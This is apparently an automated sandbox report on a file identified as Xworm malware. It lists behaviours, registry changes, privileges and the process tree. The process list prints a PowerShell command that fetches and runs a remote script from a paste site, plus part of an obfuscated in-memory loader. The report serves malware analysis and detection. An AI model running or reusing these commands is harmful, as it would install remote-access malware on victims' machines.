Analysis Overview
SHA256
21d23e31dae4ca8e6e3c782ad3794251a20b7b4b8244d977e566cd31852e5d38
Threat Level: Known bad
The file download (3).jfif was found to be: Known bad.
Malicious Activity Summary
Xworm
Suspicious use of NtCreateUserProcessOtherParentProcess
Detect Xworm Payload
Downloads MZ/PE file
Blocklisted process makes network request
Executes dropped EXE
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates system info in registry
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-15 10:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-15 10:17
Reported
2024-06-15 10:19
Platform
win10-20240404-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4788 created 580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\svchost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\x4s.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4s = "C:\\Users\\Admin\\AppData\\Roaming\\x4s.exe" | C:\Users\Admin\AppData\Local\Temp\x4s.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4788 set thread context of 1820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\svchost32.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 15 Jun 2024 10:18:39 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={C2FBEA2B-F513-451D-B832-98713A0C28F0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718446718" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\svchost32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\x4s.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Token: SeAuditPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
c:\windows\system32\sihost.exe
sihost.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\download (3).jpg"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell "irm rentry.co/el3rabtweakpc/raw | iex"
C:\Windows\svchost32.exe
"C:\Windows\svchost32.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\x4s.exe
"C:\Users\Admin\AppData\Local\Temp\x4s.exe"
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
"C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AtdggxCIdjhd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OsfTOJDlGYudGR,[Parameter(Position=1)][Type]$TobBKtwfze)$AogbLNPGwOT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+[Char](99)+''+'t'+'e'+'d'+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+'emo'+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+'a'+''+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+'bl'+'i'+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'led'+','+''+'A'+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'A'+''+'u'+'t'+[Char](111)+'Cla'+[Char](115)+'s',[MulticastDelegate]);$AogbLNPGwOT.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+'l'+[Char](78)+''+'a'+'m'+'e'+''+[Char](44)+''+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+'u'+'b'+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OsfTOJDlGYudGR).SetImplementationFlags('R'+[Char](117)+'n'+'t'+''+'i'+''+'m'+'e'+','+''+[Char](77)+'an'+[Char](97)+'g'+[Char](101)+''+'d'+'');$AogbLNPGwOT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+'k'+''+'e'+'','P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+'H'+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+'e'+'wS'+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$TobBKtwfze,$OsfTOJDlGYudGR).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+'M'+'a'+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output 